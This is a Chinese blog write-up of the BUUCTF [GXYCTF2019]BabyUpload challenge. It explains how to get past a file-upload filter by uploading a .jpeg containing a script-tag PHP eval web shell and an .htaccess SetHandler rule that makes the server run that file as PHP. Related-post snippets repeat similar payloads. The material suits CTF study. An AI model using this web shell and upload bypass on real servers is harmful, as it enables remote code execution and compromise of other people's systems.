【web | CTF】BUUCTF [GXYCTF2019]BabyUpload1

已于 2023-12-20 18:46:27 修改
阅读量300 收藏 1
点赞数
分类专栏: CTF - Web 文章标签: 安全 网络安全
于 2023-09-05 23:58:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46301214/article/details/132702192
版权

目录

归纳法探测1:后缀名不能有ph

归纳法探测2:不能有其他文件类型

归纳法探测3:不能有<?php

上传.htaccess文件,修改文件用php运行

连接webshell,找到flag

归纳法探测1:后缀名不能有ph

那就需要使用图片码,但没有文件包含漏洞,无法执行

所以就采用上传.htaccess配置文件来修改某文件变成php来执行

通常apache和nginx都包含有 .htaccess 配置文件,可以试试这个漏洞

归纳法探测2:不能有其他文件类型

然后更改文件名为jpeg后缀,上传

后来发现问题在Content-Type里,只能上传 image/jpeg 类型

但是发现还是能识别到,那就说明有php的特征被识别到了

可能是因为  <?php 被识别到了

归纳法探测3:不能有<?php

就改用JavaScript变成php来执行

<script language="php">@eval($_POST['cmd'])</script>

成功上传了

上传.htaccess文件,修改文件用php运行

<FilesMatch "muma.jpeg">
SetHandler application/x-httpd-php
</FilesMatch>

连接webshell,找到flag

星盾网安
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 714
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
BUU实战笔记——[GXYCTF2019]BabyUpload 1
qq_51175992的博客
07-14 816
对于文件上传一般就是先找到可以上传的文件类型,然后看传上去的文件是否可以正常使用,若不行,再考虑配置文件的方法。
BUUCTF:[GXYCTF2019]BabyUpload
末初的CSDN博客
03-24 6696
https://buuoj.cn/challenges#[GXYCTF2019]BabyUpload 有几个上传限制,一起来看一下 1、后缀名不能有ph!对于文件后缀名的限制,无法绕过这里 2、上传类型也太露骨了吧!对Content-Type的限制,修改为image/jpeg即可绕过 3、诶,别蒙我啊,这标志明显还是php啊对上传文件的内容进行了检测,不能含有<?,这里的PHP版本为:PHP/5.6.23,可以使用<script language="php">eval($_POS
[MRCTF2020]你传你呢
Sk1y的博客
03-02 2713
[MRCTF2020]你传你????呢 目录 [MRCTF2020]你传你????呢 上传.htaccess 上传1.png 蚁剑连接 题目:buu平台 解题过程: 需要上传两个文件 .htaccess是什么 原文传送门 .htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来
安恒杯2019.12月赛
一个安全研究员
12-23 1250
本小菜就做了一些简单的题目
[GXYCTF2019]BabyUpload1
qq_64201116的博客
05-14 2884
小小的文件上传,拿下!
[GXYCTF2019]BabyUpload 1
qq_43618536的博客
07-03 450
BUUCTF的[GXYCTF2019]BabyUpload 1
BUUCTF:[GXYCTF2019]BabyUpload1
羽的博客
07-07 2926
文件上传漏洞。 不过这里我要吐槽一下,这个题首先他不允许传.png文件, 再者.jpg文件不能大,打了也报错,传不上去。 可想而知,我当时在做这个题的时候跟见了鬼一样难受,什么文件都传不了。 接着做题吧: 试着传一个PHP文件,告诉我不能传ph开头的文件后缀名,所以这里表示后端把所有php和php的别名都封死了。 根据之前upload-labs积累的绕过姿势,还可以上传.htaccess文件。 再次上传一句话木马时,又被拦截了,这里应该是后端检测了文件内容。盲猜检测<...
CTF-WEB[GXYCTF 2019]BabyUpload
最新发布
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
CTF-WEB入门DOC-2019版1
08-03
1. 明确自己打CTF是为了娱乐,还是为了以后的工作发展 2. 如果是为了工作,那么需要一颗非常有毅力的心 3. 做好放弃周末休息时间的准备 4. 你的绝大多数
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF
CTF工具之御剑后台扫描(web).rar
09-16
此工具用于学习交流用途,切勿用于其它用途。
文件上传 [GXYCTF2019]BabyUpload1
m0_75178803的博客
11-09 324
其中.htaccess文件内容:SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析,那么无论上传任何文件,只要符合php语言代码规范,就会被当做PHP执行。2.htaccess文件在上传的时候必须通过bp抓包来改变文件格式才能上传成功。因此我们需要先上传 .htaccess 文件,然后再上传 2.jpg文件。,可以直接上传.htaccess来设置使用php解析任意文件。上传成功后我们访问一下路径。接下来我们上传2.jpg。没有报错,说明上传成功。
文件上传漏洞学习
weixin_63231007的博客
04-20 2886
<1>概述 漏洞产生原因:服务端代码未对客户端上传的文件进行严格的验证和过滤,就容易造成可以上传任意文件的情况。 <2>文件上传绕过 (1)js检测绕过 1.删除js中检测文件的代码; 2.上传的文件改为允许的后缀绕过js检测后再抓包,把后缀名改为可执行的文件。 (2)文件后缀名绕过 1.绕过服务器限制上传文件的后缀 2.有些Apache是允许解析其他文件后缀名,例如httpd.conf中配置以下代码: AddType application/x-httpd-php
CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 811
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
[GXYCTF2019]BabyUpload 1 文件上传
weixin_45577185的博客
07-22 1883
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"
[de1ctf 2019]ssrf me 1
03-16
[de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星盾网安

能花钱买到的知识,都不贵

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值